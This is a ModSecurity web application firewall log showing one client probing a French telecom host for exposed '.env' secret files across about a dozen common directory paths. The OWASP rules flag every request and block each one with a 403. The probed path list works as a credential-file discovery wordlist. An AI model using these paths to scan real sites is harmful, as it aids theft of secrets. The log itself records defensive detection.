[Mon May 11 15:50:08.058642 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/database/.env"] [unique_id "agHekKy-5-wpj6Sx56aijQAAABc"]
[Mon May 11 15:50:08.154855 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHekKy-5-wpj6Sx56aijgAAABc"]
[Mon May 11 15:50:08.155330 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHekKy-5-wpj6Sx56aijgAAABc"]
[Mon May 11 15:50:08.155532 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHekKy-5-wpj6Sx56aijgAAABc"]
[Mon May 11 15:50:08.249746 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/.env"] [unique_id "agHekKy-5-wpj6Sx56aijwAAABc"]
[Mon May 11 15:50:08.250259 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/.env"] [unique_id "agHekKy-5-wpj6Sx56aijwAAABc"]
[Mon May 11 15:50:08.250494 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/.env"] [unique_id "agHekKy-5-wpj6Sx56aijwAAABc"]
[Mon May 11 15:50:08.344204 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/html/.env"] [unique_id "agHekKy-5-wpj6Sx56aikAAAABc"]
[Mon May 11 15:50:08.344675 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/html/.env"] [unique_id "agHekKy-5-wpj6Sx56aikAAAABc"]
[Mon May 11 15:50:08.344884 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/var/www/html/.env"] [unique_id "agHekKy-5-wpj6Sx56aikAAAABc"]
[Mon May 11 15:50:08.438885 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/current/.env"] [unique_id "agHekKy-5-wpj6Sx56aikQAAABc"]
[Mon May 11 15:50:08.439369 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/current/.env"] [unique_id "agHekKy-5-wpj6Sx56aikQAAABc"]
[Mon May 11 15:50:08.439582 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/current/.env"] [unique_id "agHekKy-5-wpj6Sx56aikQAAABc"]
[Mon May 11 15:50:08.533865 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /release/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/release/.env"] [unique_id "agHekKy-5-wpj6Sx56aikgAAABc"]
[Mon May 11 15:50:08.534252 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/release/.env"] [unique_id "agHekKy-5-wpj6Sx56aikgAAABc"]
[Mon May 11 15:50:08.534436 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/release/.env"] [unique_id "agHekKy-5-wpj6Sx56aikgAAABc"]
[Mon May 11 15:50:08.632340 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /releases/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/releases/.env"] [unique_id "agHekKy-5-wpj6Sx56ailAAAABc"]
[Mon May 11 15:50:08.632780 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/releases/.env"] [unique_id "agHekKy-5-wpj6Sx56ailAAAABc"]
[Mon May 11 15:50:08.632977 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/releases/.env"] [unique_id "agHekKy-5-wpj6Sx56ailAAAABc"]
[Mon May 11 15:50:08.728582 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/shared/.env"] [unique_id "agHekKy-5-wpj6Sx56ailgAAABc"]
[Mon May 11 15:50:08.728967 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/shared/.env"] [unique_id "agHekKy-5-wpj6Sx56ailgAAABc"]
[Mon May 11 15:50:08.729182 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/shared/.env"] [unique_id "agHekKy-5-wpj6Sx56ailgAAABc"]
[Mon May 11 15:50:08.823940 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /deploy/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/deploy/.env"] [unique_id "agHekKy-5-wpj6Sx56aimAAAABc"]
[Mon May 11 15:50:08.824455 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/deploy/.env"] [unique_id "agHekKy-5-wpj6Sx56aimAAAABc"]
[Mon May 11 15:50:08.824678 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/deploy/.env"] [unique_id "agHekKy-5-wpj6Sx56aimAAAABc"]
[Mon May 11 15:50:08.918842 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /build/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/build/.env"] [unique_id "agHekKy-5-wpj6Sx56aimQAAABc"]
[Mon May 11 15:50:08.919247 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/build/.env"] [unique_id "agHekKy-5-wpj6Sx56aimQAAABc"]
[Mon May 11 15:50:08.919439 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/build/.env"] [unique_id "agHekKy-5-wpj6Sx56aimQAAABc"]
[Mon May 11 15:50:09.013980 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dist/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/dist/.env"] [unique_id "agHekay-5-wpj6Sx56aimwAAABc"]
[Mon May 11 15:50:09.014378 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/dist/.env"] [unique_id "agHekay-5-wpj6Sx56aimwAAABc"]
[Mon May 11 15:50:09.014572 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/dist/.env"] [unique_id "agHekay-5-wpj6Sx56aimwAAABc"]
[Mon May 11 15:50:09.108326 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/public_html/.env"] [unique_id "agHekay-5-wpj6Sx56ainQAAABc"]
[Mon May 11 15:50:09.108739 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/public_html/.env"] [unique_id "agHekay-5-wpj6Sx56ainQAAABc"]
[Mon May 11 15:50:09.108964 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/public_html/.env"] [unique_id "agHekay-5-wpj6Sx56ainQAAABc"]
[Mon May 11 15:50:09.204227 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /htdocs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/htdocs/.env"] [unique_id "agHekay-5-wpj6Sx56aioAAAABc"]
[Mon May 11 15:50:09.204679 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/htdocs/.env"] [unique_id "agHekay-5-wpj6Sx56aioAAAABc"]
[Mon May 11 15:50:09.204938 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/htdocs/.env"] [unique_id "agHekay-5-wpj6Sx56aioAAAABc"]
[Mon May 11 15:50:09.298735 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/www/.env"] [unique_id "agHekay-5-wpj6Sx56aiogAAABc"]
[Mon May 11 15:50:09.299152 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/www/.env"] [unique_id "agHekay-5-wpj6Sx56aiogAAABc"]
[Mon May 11 15:50:09.299369 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/www/.env"] [unique_id "agHekay-5-wpj6Sx56aiogAAABc"]
